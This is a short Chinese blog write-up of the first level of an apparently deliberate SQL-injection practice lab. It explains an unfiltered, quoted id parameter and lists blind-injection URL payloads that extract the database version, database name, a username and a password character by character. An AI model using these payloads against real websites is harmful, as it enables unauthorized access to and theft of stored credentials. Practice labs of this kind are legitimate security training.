Less-1

admin 2021年9月1日15:06:58评论79 views字数 693阅读2分18秒阅读模式

Less-1

这是Less-1输入变量部分的源码,可以看到对于直接GET进来的文本没有过滤。
同时,在查询语句中,id=’$id’,变量加了引号。这里引号的意思是把输入的id当做字符串来处理,取从头开始的最长数字且类型转换为整形进行查询。

?id=12a                显示id为12的用户
?id=1a2a            显示id为1的用户
?id=102a            显示id为102的用户(不存在)
盲注
?id=1%27and+left(version(),1)=5%23                得出数据库版本为5开头
?id=1%27and+length(database())=8%23                      数据库名长度为8
?id=1%27and+left(database(),8)='security'%23         数据库为security
?id=1%27and+length(username)=4%23                用户名长度为4
?id=1%27and+left(username,4)='Dumb'%23            用户名为Dumb
?id=1%27and+length(password)=4%23               密码长度为4
?id=1%27and+left(password,4)='Dumb'%23          密码为Dumb

虽然,他的密码已经摆在面上了- -但是还是可以练习一下的。

FROM :rickyhao.com | rickyhao.com

相关推荐: XSS:RPO(Relative Path Overwrite)攻击

0x00 具体原理参考: Infinite Security: (Relative Path Overwrite) RPO XSS RPO Gadgets RPO攻击 0x01 RPO攻击首先利用的是通过相对路径引入的CSS,如 <link href="…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日15:06:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Less-1https://cn-sec.com/archives/499878.html

发表评论

匿名网友 填写信息